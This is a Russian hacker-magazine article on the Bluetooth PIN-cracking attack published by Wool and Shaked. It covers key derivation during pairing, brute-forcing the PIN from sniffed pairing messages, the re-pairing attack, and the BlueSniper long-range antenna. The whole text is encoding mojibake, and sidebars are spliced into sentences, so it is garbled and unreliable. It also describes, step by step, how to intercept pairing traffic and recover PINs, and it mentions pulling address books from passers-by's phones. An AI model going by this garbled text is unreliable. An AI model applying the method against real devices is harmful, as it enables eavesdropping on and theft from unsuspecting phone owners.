Âîçìîæíîñòü ïàò÷à ïðîâåðü ñàì, äóìàåòñÿ, ÷òî òàì íå âñå áóäåò òàê ïðîñòî. Ê òîìó æå íàóêà íå ñòîèò íà ìåñòå: ìàòåìàòèêè è êðèïòîãðàôû ïîñòîÿííî âåäóò ðàáîòó ïî èçó÷åíèþ ñòîéêîñòè êðèïòîàëãîðèòìîâ. Áûëî, ê ïðèìåðó, âûÿâëåíà íåêîòîðàÿ çàêîíîìåðíîñòü â ðàñïðåäåëåíèè ïðîñòûõ ÷èñåë. Çàìå÷åíî, ÷òî ïðîñòûå ÷èñëà ðàñïîëàãàþòñÿ íà ÷èñëîâîé îñè ñâîåãî ðîäà ñêîïëåíèÿìè, ÷òî ìîæåò íåìíîãî îáëåã÷èòü èõ ïîèñê. Íî ïîêà àëãîðèòì RSA îñòàåòñÿ îäíèì èç ñàìûõ ñòîéêèõ àëãîðèòìîâ øèôðîâàíèÿ. BINARY YOUR’S z

Íà íàøåì äèñêå Ñòåï âûëîæèë ìàññó äîêóìåíòîâ, ïîñâÿùåííûõ êðèïòîãðàôèè, âñå óïîìÿíóòûå â ñòàòüå óòèëèòû è ïðîãðàììû, âêëþ÷àÿ ëîìàåìóþ òóëçó äëÿ îáñ÷åòà ýëåêòðè÷åñêèõ öåïåé è èñõîäíèêè êåéãåíà.

067


ÂÇËÎÌ ÂÇËÎÌ ///// ISSUE

1.5 ÊÃ. ÌÎÇÃÎÂ, ×ÒÎÁÛ ÁÛÑÒÐÎ ÄÓÌÀÒÜ

ÓÄÎÁÍÛÉ ÐÞÊÇÀÊ, ×ÒÎÁÛ ÒÀÑÊÀÒÜ ÍÎÓÒ

ÌÎÙÍÀß ÂÛÑÎÊÎ×ÀÑÒÎÒÍÀß ÀÍÒÅÍÍÀ, ×ÒÎÁÛ ÄÀËÅÊÎ ÁÈÒÜ

Íà íàøåì äèñêå òû íàéäåøü ïîëíûå âåðñèè ïðîãðàìì, îïèñàííûõ â ýòîé ñòàòüå, à òàêæå ïîëíóþ ïîäáîðêó äîêóìåíòàöèè î áàãàõ bluetooth.

068

ÎÏÒÈ×ÅÑÊÈÉ ÏÐÈÖÅË, ×ÒÎÁÛ ËÓ×ØÅ ÂÈÄÅÒÜ ÆÅÐÒÂÓ

XÀÊÅÐ 01 /85/ 06


TEXT ÀËÅÊÑÀÍÄÐ ËÞÁÈÌÎÂ AKA SASHIKS / REAL_SSHX@MAIL.RU /

SUPERSNIPER

ÐÀÇÁÈÐÀÅÌÑß Â ÊÐÈÒÈ×ÅÑÊÎÉ ÓßÇÂÈÌÎÑÒÈ ÏÐÎÒÎÊÎËÀ BT

ß ÍÅ ÑÒÀÍÓ ÂÅËÈ×ÀÉØÈÌ ÌÛÑËÈÒÅËÅÌ ÑÎÂÐÅÌÅÍÍÎÑÒÈ, ÅÑËÈ ÑÊÀÆÓ “ ×ÒÎ BT ÑÅÉ×ÀÑ ÏÐÈÎÁÐÅË ÑÓÌÀÑØÅÄØÓÞ ÏÎÏÓËßÐÍÎÑÒÜ: ÁËÞÒÓÑ-ÌÎÄÓËßÌÈ ÎÁÎÐÓÄÎÂÀÍÎ ÁÓÊÂÀËÜÍÎ ÂÑÅ: ÎÒ ÒÅËÅÔÎÍÎÂ È ÄÎ ÏÐÈÍÒÅÐÎÂ Ñ ÍÎÓÒÁÓÊÀÌÈ; ÏÎ ÓËÈÖÀÌ ÃÎÍßÞÒ ÒÎËÏÛ ÐÀÄÎÑÒÍÛÕ ÁËÞÄÆÅÊÅÐÎÂ; ÊÓ×À ËÞÄÅÉ Â ÌÃÍÎÂÅÍÈÅ ÎÊÀ ÎÁÌÅÍÈÂÀÞÒÑß ÊÎÍÒÀÊÒÀÌÈ È ÇÀÏÈÑßÌÈ ÑÎ ÑÂÎÈÕ ÒÅËÅÔÎÍÎÂ. ÊÀÇÀËÎÑÜ ÁÛ, ÂÑÅ ÄÎÂÎËÜÍÛ È ÍÈÊÒÎ ÍÅ ÆÀËÓÅÒÑß. ÎÄÍÀÊÎ Ñ ÊÀÆÄÛÌ ÄÍÅÌ ÍÀÊÀÏËÈÂÀÅÒÑß ÂÑÅ ÁÎËÜØÅ È ÁÎËÜØÅ ÂÎÏÐÎÑΠÎÒÍÎÑÈÒÅËÜÍÎ ÁÅÇÎÏÀÑÍÎÑÒÈ ÝÒÎÃÎ ÏÐÎÒÎÊÎËÀ. ÌÛ ÓÆÅ ÏÈÑÀËÈ ÎÁ ÎÑÍÎÂÍÛÕ ÁÀÃÀÕ BLUETOOTH, À ÑÅÃÎÄÍß ÐÀÑÑÊÀÆÅÌ Î ÍÎÂÎÉ ÌÅ-

ÒÎÄÈÊÅ ÂÇËÎÌÀ, ÊÎÒÎÐÓÞ ÐÀÇÐÀÁÎÒÀËÈ ÄÂÀ ÂÅÑÅËÛÕ ÈÇÐÀÈËÜÒßÍÈÍÀ ÏÎÂÅÑÒÜ Î ÃÎËÓÁÛÕ ÇÓÁÀÕ Âîçìîæíî, â ýòîì ìåñòå ñòàòüè ñòîèëî âûðàçèòü ñâîå íåãîäîâàíèå: äûðêà â òàêîì ïîïóëÿðíîì ïðîòîêîëå! Îáîëòóñû è íåãîäÿè ýòè ñêàíäèíàâû, ðàçðàáîò÷èêè bluetooth! Íî, ÿ äóìàþ, áóäåò ëó÷øå îòïðàâèòü âñþ êðèòèêó è íåäîâîëüíûå âîçãëàñû îòíîñèòåëüíî BT-áàãè àêêóðàòíî â òîïêó è, ñîáñòâåííî, ïðèñòóïèòü ê äåëó. À äåëî â òîì, ÷òî â ìàå ýòîãî ãîäà Àâèøà Âóë è ßíèâ Øàêåä (Avishai Wool, Yaniv Shaked) — ñîòðóäíèêè Òåëü-Àâèâñêîãî óíèâåðñèòåòà îïóáëèêîâàëè â Èíòåðíåòå ïîäðîáíîå îïèñàíèå àòàêè íà áëþòóñ-óñòðîéñòâà. Ìàòåðèàë íàäåëàë äîâîëüíî ìíîãî øóìà (òû, íàâåðíîå, ñëûøàë î íåì, äà?), è ýòî íå çðÿ. Ñóòü íàïàäåíèÿ çàêëþ÷àåòñÿ â òîì, ÷òî õàêåð ìîæåò ïîõèòèòü PIN-êîä âî âðåìÿ ïðîöåññà ïàðèíãà (pairing) äâóõ äåâàéñîâ. Ýòà ïðîöåäóðà âçëîìà äîâîëüíî ñëîæíàÿ è âêëþ÷àåò â ñåáÿ íåñêîëüêî ýòàïîâ, ñðåäè êîòîðûõ ñàìûì âàæíûìè ÿâëÿåòñÿ ñáîð ïàêåòîâ äàííûõ è èõ àíàëèç ñ ïîñëåäóþùåé ðàñøèôðîâêîé. Ñêàæó òåáå ñðàçó, ÷òî ìàòåðèàë ñâîåîáðàçíûé. Äëÿ òîãî ÷òîáû åãî ïðàâèëüíî ïîíÿòü, íóæíî íåìíîãî ïîðàçìûñëèòü è ïîäêëþ÷èòü ôàíòàçèþ. Ñàì ïðîöåññ àòàêè òåñíî ñâÿçàí ñ ìåõàíèçìîì àóòåíòèôèêàöèè è ñîçäàíèåì êëþ÷à-øèôðà ìåæäó äâóìÿ óñòðîéñòâàìè, ïîýòîìó ïåðåä òåì êàê ìû ïåðåéäåì íåïîñðåäñòâåííî êî âçëîìó PIN'à, äàâàé ïîãëÿäèì, êàêóþ ïîñëåäîâàòåëüíîñòü äåéñòâèé ñîâåðøàþò óñòðîéñòâà, æåëàþùèå ñîåäèíèòüñÿ.

ÍÀ×ÀËÎ ÍÀ×ÀË — PAIRING Ïàðèíã — ýòî ïðîöåññ, â êîòîðîì äâà (èëè áîëåå) äåâàéñà ñâÿçûâàþòñÿ äëÿ ñîçäàíèÿ îáùåé äëÿ âñåõ óñòðîéñòâ ñåêðåòíîé âåëè÷èíû Kinit, êîòîðàÿ ïîòîì èñïîëüçóåòñÿ â äàëüíåéøåì îáùåíèè ýòèõ bluetooth-óñòðîéñòâ. Ñðàçó îãîâîðþñü, ÷òî ïî õîäó òåêñòà ÿ áóäó èíîãäà íàçûâàòü ïàðèíã «ñîïðÿæåíèåì» — ýòî ñèíîíèìû, ÷òîáû òû çíàë.  íåêîòîðûõ îôèöèàëüíûõ äîêàõ ïî BT ìîæíî äàæå âñòðåòèòü ñìåøíîé ïåðåâîä («ïîäãîíêà ïàðû»), ïîýòîìó, ÿ äóìàþ, ÷òî íèêòî íå óëè÷èò íàñ â áåçãðàìîòíîñòè. Ïðîöåññ óñòàíîâêè ñâÿçè íàçûâàåòñÿ èíèöèàëèçàöèåé, è â bluetooth åå ïðèíÿòî äåëèòü íà òðè øàãà: 1 Ñîçäàíèå êëþ÷à èíèöèàëèçàöèè (òîò ñàìûé Kinit) 2 Ñîçäàíèå êëþ÷à ñâÿçè (â îôèöèàëüíîé äîêóìåíòàöèè íàçûâàåòñÿ link key è îáîçíà÷àåòñÿ, êàê Kab) 3 Àóòåíòèôèêàöèÿ Ïåðåä òåì êàê óñòðîéñòâà íà÷íóò «ñïàðèâàòüñÿ» (ëþäè, î ÷åì ÿ òóò ïèøó? :)), íà îáåèõ ñòîðîíàõ íóæíî ââåñòè ñïåöèàëüíûé PIN-êîä. Îáû÷íî, åñëè äâà ÷åëîâåêà õîòÿò ñâÿçàòü, äîïóñòèì, ñâîè òåëåôîíû, îíè çàðàíåå äîãîâàðèâàþòñÿ î òîì, êàêîé áóäåò PIN.  áóäóùåì ñîåäèíÿþùèåñÿ óñòðîéñòâà ìû áóäåì íàçûâàòü âåñüìà êðàñíîðå÷èâî — A è B; êðîìå òîãî, îäíî óñòðîéñòâî ïðè ïàðèíãå ñòàíîâèòñÿ ãëàâíûì (Master), à äðóãîå — âåäîìûì

ÒÜ ÒÈÒ Ò ÏÎÕÈÒ ß Â ÒÎÌ, ×ÒÎ ÕÀÊÅÐ ÌÎÆÅÒ ×ÀÅÒÑß ß ÇÀÊËÞ× ÄÅÍÈß ÓÒÜ ÍÀÏÀÄ ÑÓ ÓÕ ÄÅÂÀÉÑÎÂ.. ÃÀ (PAIRING)) ÄÂÓ Ä ÂÎ ÂÐÅÌß ÏÐÎÖÅÑÑÀ ÏÀÐÈÍ ÊÎÄ PIN-Ê XÀÊÅÐ 01 /85/ 06

069


ÂÇËÎÌ ///// ISSUE

Óçíàòü BD_ADDR-óñòðîéñòâà î÷åíü ïðîñòî. Äëÿ ýòîãî åñòü ñòàíäàðòíàÿ ïðîöåäóðà îïðîñà (inquiry). Ïîýòîìó àäðåñà óñòðîéñòâ A è  — íå ñåêðåò äëÿ õàêåðà :).

Kinit. Âñÿ ïðîöåäóðà äîñòàòî÷íî ïîäðîáíî îïèñàíà íà ñõåìå. Ïîñëå òîãî êàê äåâàéñû óæå îáìåíÿëèñü ïîêñîðåííûìè ñëîâàìè, íà÷èíàåòñÿ âû÷èñëåíèå êëþ÷à ïî ìåòîäó E21. Âîò ÷òî íåîáõîäèìî äëÿ Kab-êëþ÷à: 1 BD_ADDR (ýòî ìû óæå ïðîõîäèëè) 2 128-áèòíûé LK_RAND (êàæäîå óñòðîéñòâî õðàíèò ñâîå è ïîëó÷åííîå îò äðóãîãî äåâàéñà çíà÷åíèå) // Íà ýòî ìåñòå pairing ÇÀÊÀÍ×ÈÂÀÅÒÑß

îáùèé ïëàí àòàêè. Âû÷èñëÿåì ïîòåíöèàëüíûé Kinit, Kab è SRES ïî ìíèìîìó PIN'. Ïðàâäà, íåñëîæíî?

(Slave). Áóäåì ñ÷èòàòü, ÷òî óñòðîéñòâî A — ãëàâíîå, à B — âåäîìîå. Ýòî íàì ïðèãîäèòñÿ, ÷òîáû íå ïóòàòüñÿ è àäåêâàòíî âîñïðèíèìàòü ïðèâîäèìûå ñõåìû. Ñðàçó ïîñëå òîãî, êàê ïîëüçîâàòåëè ââåëè PIN-êîäû, íà÷èíàåòñÿ ñîçäàíèå êëþ÷à Kinit. Kinit ôîðìèðóåòñÿ ïî àëãîðèòìó E22, êîòîðûé îïåðèðóåò òàêèìè âåëè÷èíàìè: 1 BD_ADDR — óíèêàëüíûé àäðåñ BT-óñòðîéñòâà äëèíîé 48 áèò (òî æå ñàìîå, ÷òî è MAC-àäðåñ ó îáû÷íîé ñåòåâóõè) 2 PIN è åãî äëèíà 3 Ñëó÷àéíîå 128-áèòíîå ÷èñëî IN_RAND Íà âûõîäå, ïîñëå ðàáîòû E22 àëãîðèòìà, ïîëó÷àåì 128- áèòíîå ñëîâî, êîòîðîå ãîðäî èìåíóåòñÿ Kinit. Ñòîèò ïîä÷åðêíóòü, ÷òî ÷èñëî IN_RAND îòñûëàåòñÿ óñòðîéñòâîì A â ÷èñòîì âèäå, òî åñòü íè î êàêîì øèôðîâàíèè ðå÷è åùå íå èäåò. Åñëè PIN-êîä óñòðîéñòâà íåèçìåíÿåì, òî ïðè ôîðìèðîâàíèè êëþ÷à èíèöèàëèçàöèè (Kinit) èñïîëüçóåòñÿ BD_ADDR âòîðîãî óñòðîéñòâà. Êîãäà ó îáîèõ äåâàéñîâ ïèíû ðàçíûå, áóäåò èñïîëüçîâàí BD_ADDR(B). Ïåðâûé øàã ïàðèíãà ïðîéäåí, à çà íèì ñëåäóåò ñîçäàíèå link key Kab. Êàê òîëüêî îí áóäåò ñôîðìèðîâàí, êëþ÷ Kinit îòáðàñûâàåòñÿ è áîëüøå íå èñïîëüçóåòñÿ. Ïëàâíî ïåðåõîäèì ê ñîçäàíèþ êëþ÷à ñâÿçè (link key), êîòîðûé â ïðîñòîíàðîäüå íàçûâàþò Kab. Äëÿ ýòîãî íåõèòðîãî äåëà æåëåçêè ïåðåñûëàþò äðóã äðóãó 128-áèòíûå ñëîâà LK_RAND(A) è LK_RAND(B), êîòîðûå ãåíåðèðóþòñÿ ñëó÷àéíûì îáðàçîì è îáìåíèâàþòñÿ èìè ïîñëå ïîáèòîâîãî XOR'a êëþ÷îì èíèöèàëèçàöèè

Ïîñëå äëèòåëüíûõ ïîòóã link key âñå-òàêè ñîçäàåòñÿ, è ýòî çíà÷èò, ÷òî ñàì ïàðèíã óñïåøíî çàâåðøåí, è íà÷èíàåòñÿ ïîñëåäíèé ýòàï èíèöèàëèçàöèè bluetooth — ñîâìåñòíàÿ àóòåíòèôèêàöèÿ, èëè Mutual authentication. Ïðîöåññ îñíîâàí íà äîâîëüíî ëþáîïûòíîé ñõåìå «çàïðîñ-îòâåò». Íî îäíà èç æåëåçîê ñòàíîâèòñÿ âåðèôèêàòîðîì (òî åñ��ü «ïðîâåðÿþùèì»), ãåíåðèðóåò ñëó÷àéíîå ñëîâî AU_RAND(A) è â plain text çàñûëàåò åãî ñîñåäíåìó óñòðîéñòâó, êðàòêî íàçûâàåìîìó ïðåäúÿâèòåëåì (claimant — â îðèãèíàëüíîé äîêóìåíòàöèè). Êàê òîëüêî óñòðîéñòâî-ïðåäúÿâèòåëü ïîëó÷àåò ýòî «ñëîâî», íà÷èíàåòñÿ âû÷èñëåíèå âåëè÷èíû SRES ñ ïðèìåíåíèåì àëãîðèòìà E1, è îíà îòïðàâëÿåòñÿ âåðèôèêàòîðó. Ñîñåäíèé äåâàéñ ïðîèçâîäèò àíàëîãè÷íûå âû÷èñëåíèÿ è ïðîâåðÿåò îòâåò ïðåäúÿâèòåëÿ. Åñëè SRES'û ñîâïàëè, òî, çíà÷èò, âñå ÎÊ, è òåïåðü äåâàéñû ìåíÿþòñÿ ðîëÿìè, òàê ÷òî ïðîöåññ ïîâòîðÿåòñÿ çàíîâî. Ñàì æå SRES âû÷èñëÿåòñÿ ïî E1-àëãîðèòìó, êîòîðûé îïåðèðóåò òàêèìè âåëè÷èíàìè: 1 Ñëó÷àéíî ñîçäàííîå AU_RAND 2 link key Kab 3 Ñâîé ñîáñòâåííûé BD_ADDR Ïðåäñòàâèòü â ãîëîâå òàêîé ïðîöåññ äîâîëüíî ìóòîðíî, íî òóìàí ðàññååòñÿ, êàê òîëüêî òû âçãëÿíåøü íà ñõåìó. Âñå, ñ èíèöèàëèçàöèåé ðàçîáðàëèñü, èäåì äàëüøå. THE BASIC ATTACK Êàê ïðîèñõîäèò àóòåíòèôèêàöèÿ ìû óæå ðàçîáðàëè. Ñàìîå âðåìÿ ïðîàíàëèçèðîâàòü äàííûå, êîòîðûìè îáìåíèâàëèñü óñòðîéñòâà íà ïðîòÿæåíèè âñåãî ïðîöåññà ñîïðÿæåíèÿ: # 1 2 3 4 5 6 7

Îòêóäà A A B A B B A

Êóäà B B A B A A B

Äàííûå IN_RAND LK_RAND(A) LK_RAND(B) AU_RAND(A) SRES AU_RAND(B) SRES

Äëèííà 128 bit 128 bit 128 bit 128 bit 32 bit 128 bit 32 bit

Âèä plaintext XORed with Kinit XORed with Kinit plaintext plaintext plaintext plaintext

Îáëàäàÿ ýòèìè ñâåäåíèÿìè, ðåàëüíî ïðîäóìàòü è ðàññ÷èòàòü òåîðåòè÷åñêèé ïëàí àòàêè íà bluetooth-ñîåäèíåíèå, ÷òîáû óêðàñòü PIN. Ïðåäñòàâèì, ÷òî íåãîäÿé õàêåð ïðîñëóøàë ýôèð è âî âðåìÿ

ÑÈÍÈÉ ÑÍÀÉÏÅÐ Êàê òû, íàâåðíîå, óæå íàñëûøàí, íîìèíàëüíûé ðàäèóñ ðàáîòû óñòðîéñòâ BT-v1 íå ïðåâûøàåò 15 ìåòðîâ. Ýòó öèôðó äåêëàðèðóåò ñòàíäàðò ïðîòîêîëà, è ðàññòîÿíèå íîðìàëüíîé ðàáîòû ðåäêî ïðåâûøàåò 10 ìåòðîâ. Õàêåðàì ïîêàçàëàñü ñòðåìíîé èäåÿ õîäèòü çà «æåðòâîé», ïîäêðàäûâàÿñü ñî ñïèíû è ïðÿ÷àñü çà ðåäêèìè êóñòèêàìè, ÷òîáû ïîõèòèòü èç ìîáèëüíîãî òåëåôîíà íóæíóþ èíôó. Ïîýòîìó íà ñâåò ïîÿâèëñÿ äîâîëüíî èíòåðåñíûé äåâàéñ — âèíòîâêà BlueSniper, ðàçðàáîòàííàÿ Äæîííîì Õåðèíãòîíîì (www.flexilis.com). Êîíñòðóêöèÿ ïðåäñòàâëÿåò ñîáîé äëèííóþ àíòåííó, ñíàáæåííóþ íàñòîÿùèì ïðèöåëîì. Âèíòîâêà ïîäêëþ÷àåòñÿ ê ïîðòàòèâíîìó óñòðîéñòâó — íîóòáóêó/ÊÏÊ. Ýòî ïðèñïîñîáëåíèå ðåàëüíî óâåëè÷èâàåò ýôôåêòèâíóþ äàëüíîñòü bluetooth-óñòðîéñòâ äî 1,5 êèëîìåòðîâ. Âî âñåé Cåòè óæå ñ ìàðòà ýòîãî ãîäÿ ãóëÿåò èíôîðìàöèÿ, ÷òî àâòîð BlueSniper, íàõîäÿñü â âûñîòíîì çäàíèè Ëîñ-Àíäæåëåñêîãî îòåëÿ, íàïðàâëÿë âèíòîâêó íà ïðîõîæèõ è ñëèâàë ñ èõ òåëåôîíîâ àäðåñíûå êíèãè.

070

XÀÊÅÐ 01 /85/ 06


Ñòîèò ðàçëè÷àòü ïðîöåññ ñîïðÿæåíèÿ óñòðîéñòâ (pairing) è àóòåíòèôèêàöèè (authentication). Ïàðèíã íóæåí òîëüêî äëÿ ñîçäàíèÿ êëþ÷à ñâÿçè, êîòîðûì óñòðîéñòâà áóäóò ïîëüçîâàòüñÿ â äàëüíåéøåì, êàæäûé ðàç ïåðåäàâàÿ êàêèå-ëèáî äàííûå.

ïàðèíãà ïåðåõâàòèë è ñîõðàíèë âñå ñîîáùåíèÿ. Òåïåðü ìû ïîäîøëè âïëîòíóþ ê ãëàâíîìó âîïðîñó. Ñîáñòâåííî, ñàì âçëîì ïèíà îñóùåñòâëÿåòñÿ ïîäáîðîì. Äëÿ íà÷àëà íóæíî ñîñòàâèòü ïðîäâèíóòûé àëãîðèòì ïåðåáîðà, ÷òîáû ïîëó÷èòü õîòü êàêîé-òî ðåçóëüòàò. Âîò ñìîòðè, ìû ïåðåõâàòèëè IN_RAND (îí íåøèôðîâàííûé) è BD_ADDR (ïðè÷åì ó îáîèõ óñòðîéñòâ àäðåñà âèäíû â ýôèðå) è çàïóñêàåì àëãîðèòì E22; åìó ïåðåäàþòñÿ âûøåïåðå÷èñëåííûå äàííûå è íàø «ïîòåíöèàëüíûé» PIN. Ìû íàõîäèì ïðåäïîëàãàåìîå çíà÷åíèå Kinit, ýòî âûãëÿäèò ïðèìåðíî òàê:

Ó íåêîòîðûõ óñòðîéñòâ, íàïðèìåð BT-ãàðíèòóð, áûâàåò æåñòêî ïðîïèñàí ôèêñèðîâàííûé PIN — îáû÷íî ñòðîêà «0000».

ñêîðîñòè. Íàøè èçðàèëüñêèå äðóçüÿ ñîâåðøèëè íàñòîÿùèé ïðîðûâ, íàéäÿ íåñêîëüêî ñïîñîáîâ ñîêðàòèòü â ðàçû âðåìÿ ïåðåáîðà PIN-êîäà. Ïîäðîáíî îïèñûâàòü ïðåäëîæåííûå èìè óëó÷øåíèÿ ó ìåíÿ íåò âîçìîæíîñòè, ïîÿñíþ ëèøü, ÷òî ðå÷ü èäåò îá àäàïòàöèè áàçîâûõ àëãîðèòìîâ BT-ñòåêà, ÷òî è ïîçâîëèëî óìåíüøèòü âðåìÿ, íåîáõîäèìîå äëÿ âçëîìà PIN-êîäà. Íî ñòàðàÿ ïðîáëåìà íèêóäà íå äåëàñü: åñëè âçëîìùèê îïîçäàë è íå óñïåë çàõâàòèòü âñå ïàêåòû ñ ñàìîãî íà÷àëà «ñïàðèâàíèÿ» óñòðîéñòâ, òî ó íåãî íè÷åãî íå ïîëó÷èòñÿ. È ýòó ïðîáëåìó óäà÷ëèâûå èçðàèëüòÿíå áëàãîïîëó÷íî ðåøèëè.

Kinit = E22[IN_RAND, BD_ADDR(B), PIN'] //PIN' — ïðåäïîëàãàå- RE-PAIRING ATTACK ìûé íàìè ïèí-êîä Íàøèì äðóçüÿì Âóëó è Øàêåäó óäàëîñü èñïðàâèòü íåäîñòàòîê òåõÈäåì äàëüøå, ñìîòðè íà òàáëèöó âûøå: ñîîáùåíèÿ 2 è 3 ïîêñîðåíû Kinit'îì, êîòîðûé ìû òîëüêî ÷òî ñãåíåðèðîâàëè. Çíà÷èò, ñåé÷àñ ìû ïîëó÷èì LK_RAND(A) è LK_RAND(B) â ÷èñòîì âèäå. Ñîáñòâåííî ãîâîðÿ, íàì íèêòî íå ìåøàåò âûñ÷èòàòü ãèïîòåòè÷åñêîå çíà÷åíèå Kab. Ïðîäåëûâàåì ñëåäóþùóþ îïåðàöèþ:

LK_K(A) = E21[BD_ADDR(A), LK_RAND(A)] //LK_K(A|B) — ýòî ïðîìåæóòî÷íûå âåëè÷èíû LK_K(B) = E21[BD_ADDR(B), LK_RAND(B)] // XOR'èì èõ ìåæäó ñîáîé è ïîëó÷àåì êëþ÷ ñâÿçè Kab = LK_K(A) XOR LK_K(B) Òåïåðü ñàìîå âðåìÿ ïðîâåðèòü íàø «ïîòåíöèàëüíûé» ïèí. ×òîáû óçíàòü, äåéñòâèòåëüíî ëè îí íàñòîÿùèé, ìû áåðåì ñâåæåèñïå÷åííûé Kab è ïåðåõâà÷åííûé AU_RAND(A) è âû÷èñëÿåì çíà÷åíèå SRES(A). Ïîñëå ýòîãî ñðàâíèâàåì ïîëó÷åííûé ðåçóëüòàò ñ SRES(A)', êîòîðûé õðàíèòñÿ â ñîîáùåíèè íîìåð 5:

SRES(A) = E1[AU_RAND(A), Kab, BD_ADDR(B)] Åñëè SRES(A) == SRES(A)' — ìû óñïåøíî óãàäàëè ïèí! Åñëè æå âûøåë îáëîì, òî íà÷èíàåì ïðîèçâîäèòü âñþ ïîñëåäîâàòåëüíîñòü äåéñòâèé çàíîâî, òîëüêî òåïåðü áåðåì äðóãîé PIN'. Âîò òàêàÿ âîò õèòðàÿ ìåòîäèêà ïîëó÷èëàñü. Âñå âûøåîïèñàííîå, â ïðèíöèïå, íå íîâîñòü. Ïåðâûì ÷åëîâåêîì, êîòîðûé çàìåòèë ýòó áðåøü, åñëè åå ìîæíî òàê íàçâàòü, áûë àíãëè÷àíèí Îëëè Âàéòõàóç (Ollie Whitehouse) åùå â àïðåëå 2004 ãîäà. Èìåííî îí äîãàäàëñÿ ïåðåõâàòèòü ñîîáùåíèÿ âî âðåìÿ ïàðèíãà è ïîïûòàòüñÿ âû÷èñëèòü PIN ìåòîäîì ïåðåáîðà ñ ïîìîùüþ ïîëó÷åííîé èäåíòèôèêàöèîííîé èíôîðìàöèè. Òåì íå ìåíåå ìåòîä, ïðåäñòàâëåííûé Âàéòõàóçîì, èìåë îäèí äîñòàòî÷íî âåñîìûé èçúÿí: àòàêó ìîæíî áûëî ïðîâåñòè òîëüêî â òîì ñëó÷àå, åñëè õàêåð ñìîã âûëîâèòü âñå àóòåíòèôèêàöèîííûå äàííûå. Òî åñòü, åñëè âçëîìùèê íàõîäèëñÿ âíå ýôèðà âî âðåìÿ íà÷àëà ïàðèíãà, òî îí ïðîëåòàåò êàê ôàíåðà íàä Ïàðèæåì — ïåðâûå ïàêåòû ñ äàííûìè óæå îòïðàâëåíû è îòëîâèòü èõ íå ïðåäñòàâëÿåòñÿ âîçìîæíûì.

íîëîãèè âçëîìà, êîòîðóþ ïðåäëîæèë â ñâîå âðåìÿ Âàéòõàóç, è ðàçðàáîòàòü âòîðîé òèï àòàêè. Åñëè óñòðîéñòâà íà÷àëè ïðîöåññ îáìåíà àóòåíòèôèêàöèîííûìè äàííûìè, òî ìû óæå íå ìîæåì ïåðåõâàòèò âñå ñîîáùåíèÿ è ñîñòàâèòü àëãîðèòì ïåðåáîðà ïèíà, ïðàâèëüíî? Íàøè èçðàèëüñêèå äðóçüÿ ñìîãëè âðó÷íóþ «çàñòàâèòü» óñòðîéñòâà çàíîâî ïåðåèíèöèàëèçèðîâàòü âåñü ïðîöåññ ïàðèíãà. Ñìîòðè, êàê òîëüêî Kab-êëþ÷ ñîçäàí, êàæäàÿ BT-äåâàéñèíà ñîõðàíÿåò åãî äëÿ áóäóùåé ñâÿçè ñî ñîïðÿæåííûì óñòðîéñòâîì. Åñëè âäðóã â äàëüíåéøåì îäíî èç óñòðîéñòâ çàõî÷åò ñâÿçàòüñÿ ñ ñîñåäíèì, òî èì íå ïðèäåòñÿ çàíîâî ïðîõîäèòü ïðîöåññ ïàðèíãà. Âòîðàÿ àòàêà, íàçâàííàÿ Re-Pairing attack (ïåðåâîäèòñÿ, êàê àòàêà íà ïåðåñîïðÿæåíèå), ýêñïëóàòèðóåò ïðîòîêîë óñòàíîâëåíèÿ ñâÿçè è çàñòàâëÿåò ñîïðÿæåííûå óñòðîéñòâà íà÷àòü âåñü ïðîöåññ ïàðèíãà çàíîâî — îòñþäà è íàçâàíèå. Ýòî ïîçâîëÿåò âçëîìùèêó ïåðåõâàòèòü âñå íåîáõîäèìûå ñîîáùåíèÿ â ýôèðå è ïðîèçâåñòè îñíîâíóþ àòàêó, ïðèíöèïû êîòîðîé ÿ óæå îïèñàë ÷óòü âûøå. Èçó÷èì ýòîò âîïðîñ íåìíîãî äåëèêàòíåå. Äëÿ íà÷àëà ïðåäñòàâèì, ÷òî äâà óñòðîéñòâà óñïåëè ñâÿçàòüñÿ, ñîõðàíèòü êëþ÷ ñâÿçè Kab è óæå ïåðåøëè ê ñòàäèè Mutual authentication. Äàëåå íàäî çàñòàâèòü æåëåçÿ÷êè çàíîâî «ñïàðèòüñÿ».  îáùåé ñëîæíîñòè îïèñàíî òðè ìåòîäà àòàêè íà ïåðåñîïðÿæåBT-óñòðîéñòâà îáìåíèâàþòñÿ íèå, ïðè÷åì êàæäàÿ èç íèõ çàâèñèò LK_RAND-÷èñëàìè, çàùèùåííûìè îò êà÷åñòâà ðåàëèçàöèè BluetoothKinint'îì. Âïîñëåäñòâèè áóäåò ÿäðà â êîíêðåòíîì àïàðàòå. Âîò ýòè ñîçäàí Kab-key ïî àëãîðèòìó E21 ìåòîäû â ïîðÿäêå ýôôåêòèâíîñòè:

ÊÒÎ ÁÛÑÒÐÅÉ Ïîíÿòíî, ÷òî êîíêðåòíûå ðåàëèçàöèè îïèñàííîãî âûøå ïðîöåññà ìîãóò ðàáîòàòü ñ ðàçëè÷íîé ñêîðîñòüþ. Ìîæíî îïòèìèçèðîâàòü ýòè ïðîãðàììû, èñïîëüçóÿ ñïåöèàëüíûå íàñòðîéêè êîìïèëÿòîðà, ìîæíî ïåðåïèñûâàòü ïî-ðàçíîìó öèêëû, óñëîâèÿ è àðèôìåòè÷åñêèå îïåðàöèè, æåëàÿ äîáèòüñÿ ìàêñèìàëüíîé

XÀÊÅÐ 01 /85/ 06

071


ÂÇËÎÌ ///// ISSUE

ÇÀÌÅÒÊÈ Ê RE-PAIRING-ÀÒÀÊÅ 1. Ñïåöèôèêàöèÿ Bletooth-ïðîòîêîëà äîïóñêàåò, ÷òî óñòðîéñòâî ìîæåò çàáûòü êëþ÷ ñâÿçè (link key) è çàïðîñèòü ïîâòîð ïðîöåññà ñïðÿæåíèÿ. Áëàãîäàðÿ ýòîìó àòàêà íà «ïåðåñîïðÿæåíèå» ñòàëà îñóùåñòâèìà 2. Àòàêà íà ïåðåñîïðÿæåíèå — àêòèâíûé ïðîöåññ, è, ÷òîáû åãî îñóùåñòâèòü, íåîáõîäèìî îòïðàâèòü ñîîáùåíèå â òî÷íûé ìîìåíò îáìåíà äàííûìè. Êàê òû óæå ïîíÿë, ñòàíäàðòíûå óñòðîéñòâà (êîòîðûå ïðîäàþò â ìàãàçèíå çà óãëîì) íå ïîäõîäÿò äëÿ ðåàëèçàöèè ïîäîáíîãî ðîäà äåéñòâèé. Äëÿ ýòîãî íóæíî ñïåöèàëüíîå îáîðóäîâàíèå 3. Åñëè âåäîìîå (slave) óñòðîéñòâî ïðîâåðÿåò íà âàëèäíîñòü BD_ADDR, ñ êîòîðîãî ïðèõîäÿò äàííûå, 